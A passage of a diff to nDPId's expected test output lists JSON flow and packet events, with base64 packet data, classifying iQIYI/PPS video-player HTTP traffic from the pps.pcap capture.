-02162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1467353157142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui9AADgGBqffGmpCwKhzCABQxTtKZselLgIykFAQAB\/aLgAAopnkFb6w\/Gf9wcd\/TnuexQBjLwWa0uCe9TPr4qE3jsphraOf\/lM4Hhi9NJILTNUPpkUh0lJVsTBg0+IryxSW3IwYySV6wkzB0\/tYDwbO6SOx\/W5mmrffIH5hc9hR+iJYkdxSMJyhs5tL+JX3Z4urkWLC21HQmnbWWhKwwr3IOESy8lC4QLT5bzgZZwV6aylc3BKRGmkWqvo3gveBLOrAMA4JoqHhbMBYA7GEB3n5XVRePARG35OUMCE\/8TDQo0+dLC24GKANopCzYZkvfPVaY0dRDrv50emXg1Cs9WSfVu50aDF7YYVdx5mx545GrUAMEsqIjDQ\/4DCox7xS+Ws\/dwFhUTJ0P8Dx\/xK2lp12JPYf\/zG6tdTYMt3AacBTBvLHFFde\/reBoQaTbZB\/vJdywKaKtIzwqCOs4Q9YPbL8+Pq1VE1FdEBeuONtnWPx9wNuAvH6U\/JENWXsD\/bsjom76483YU\/XZIQUgj30cOEgQwuDamiBln+90aAngeN2nOL6ntmgjdG66Xp5PKfwQlwuGdvacgApEFyIvnfxUhm77eXRcDexRzOKtayXJEIXZt52rm2WbDXx+l2L+n6mDI5HPlSGKuvP84rwmMwhT7yEvzQKbivh5sn9I8EjZx6KaukURUZTKe54jHmLC3Jmf2BKkUKfD+otim\/knbUQxDjsPRmRG1Nf5oF86K6KEl\/nFEI9A5kcjFcko+VuDqw9SWzSXgKad5EYc4r+hlUwt3uzj59viQUjCCWYguaIGZ8C5ZjdSExE6IsY1BXoMFqHoRzfJaDg6uSsFAjJS92cQgN0nWwTaQFWx1m2slB35iQ1wft22PbPDl49icFcTFpAz2oY5Pp3lfvj5IUJyUTHt3u8v74exA53o9ooOtbqs2j42om\/zaB3iyhBCsOikAKzbr0K6CxGSwBAWdloUe96BLdalzPNcqhIK0c0YJvH4tBdmDh+5ufseEBw7BGI2ipV6yVNpFO0kDqCajN7YsN05JDg13dAXzY2SAQ5QfKni3cz7N9WhYMt7COKUvI+C0iwIaEB32bniucRrN4HsPO11eCbWDnltN\/+kP2qhoa5r1DcSUAZq6JPm51\/USDg6qO4x\/Vapf6ZVCWehE+KdgGpX4qBTKeA+bV7qois7qvnsCmBXUWPo21DtRYTVMizQCWWQqH0CGGSEtoZ24ZE8Em+sX59yNgKKKnBzY4rxhy1pF8qyBkoHpDm9lBx3JEleYOnrbk5vilJTiHsG0C7im31hM5hXvKl2rEhKIpc+QgsAwc8xEkz7398lWjZRYNmVmvhEG3GTaIjL7zuDYVBFnz\/Ep+CquTSroYI\/KVwc+2ze3Q+yBDcODi+bFdRr\/qJ\/RfL4FgeDb9sduAkPb3xQiixfjLzyzTazf6dzG3+S06aSi8zpu2nZ2pA6Ukh\/FodlR311cw8YfsxYuiSFyYqZDzpce1Qm0XZXnys8qlDnUmjILug1tlJBa1UzH74juRDwgD0Fnwh1MLjNAsmUIrgA0GSsiEjUBU047yfXV\/qzyvQus+1BXKIiklyV0Xin7L0ua0Yj38t6gGn+ytwXAmSh71WYg7o3suhEh2DpzfHKZ9IBKf8gIvOvhTvSepAfXGEaca4phlMY6YIuwsde9HzRk9q6m3wLv6MKf1l9nyMKAHgaDMdK68E7LAU50IjtX2yCF8K"} -01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353157138,"flow_last_seen":1467353157142,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2892,"flow_avg_l4_payload_len":964,"midstream":1,"thread_ts_msec":1467353157142,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7440000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1467353157433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":389,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":389,"pkt_l4_len":355,"thread_ts_msec":1467353157433,"pkt":"TF4M6gNlABxCjnAxCABFAAF3D2lAAIAGOZbAqHMIb84NA8U8AFD\/xaF06zAEllAYAQRGTAAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P3F5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiBIVFRQLzEuMQ0KSG9zdDogcGRhdGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBIQ0ROQ2xpZW50X1dJTlBDO2xpYmN1cmwvNy4yNi4wIE9wZW5TU0wvMS4wLjFnIHpsaWIvMS4yLjU7UUsvMTAuMC4wLjI5Mw0KDQo="} -00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7440000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1467353157468,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353157468,"pkt":"TF4M6gNlABxCjnAxCABFAAOkD3JAAIAG2tjAqHMIymwO7MU9AFA84A6MMfAazlAYQTez3QAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNTcwNDYmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353157046&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1467353157475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157475,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDRAADMGDUtvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7440000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00992{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1467353157509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":457,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":457,"pkt_l4_len":423,"thread_ts_msec":1467353157509,"pkt":"TF4M6gNlABxCjnAxCABFAAG7D3xAAIAGbLPAqHMI3xpqQsU+AFB482xgj\/e7VVAYAQRcuQAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmEzMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQpSYW5nZTogYnl0ZXM9MzQyNDI1Ni04MDU3MDIzDQoNCg=="} -01136{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7440000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012&uuid=76a3085a-57760844-8b","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1467353157533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353157533,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5zsFAADMGa3TKbA7swKhzCABQxT0x8BrOPOASCFAYACB8+QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1467353157718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157718,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDVAADMGDUpvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7560000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1467353155790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353155790,"pkt":"TF4M6gNlABxCjnAxCABFAAKdDjtAAIAG3SfAqHMIymwO28U3AFCNS81scTxdzlAYAQSLywAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0xNSZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNTUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7560000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=15&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353155&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00795{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1467353156641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":311,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":311,"pkt_l4_len":277,"thread_ts_msec":1467353156641,"pkt":"TF4M6gNlABxCjnAxCABFAAEpDsFAAIAGbi7AqHMI3xpqFMU4AFDYI3WbArNbVVAYAQSIDAAAR0VUIC8yMDE2MDYyNS9hNS9iZi80MTNmOTFhZDEwMWU3ODBhNmI2M2Y4MjZlMjhiOTkyMC54bWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1ldGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOjUwMDQ5NDYwMF8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} +00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"meta.video.qiyi.com","url":"meta.video.qiyi.com\/20160625\/a5\/bf\/413f91ad101e780a6b63f826e28b9920.xml","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1467353156699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353156699,"pkt":"ABxCjnAxTF4M6gNlCABFAAUU\/f1AADgGwwbfGmoUwKhzCABQxTgCs1tV2CN2nFAQAB+1jgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNTo1NiBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC94bWwNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDI1IEp1biAyMDE2IDA2OjA4OjM2IEdNVA0KRXhwaXJlczogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjo1MCBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MzAwDQpYLUNhY2hlOiBmcm9tIDEwLjEyMS4zNC4xNDANCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogRVhQSVJFRCBmcm9tIDIyMy4yNi4xMDYuMjANCg0KNWZlDQofiwgAAAAAAAADhZnrbhs5DIX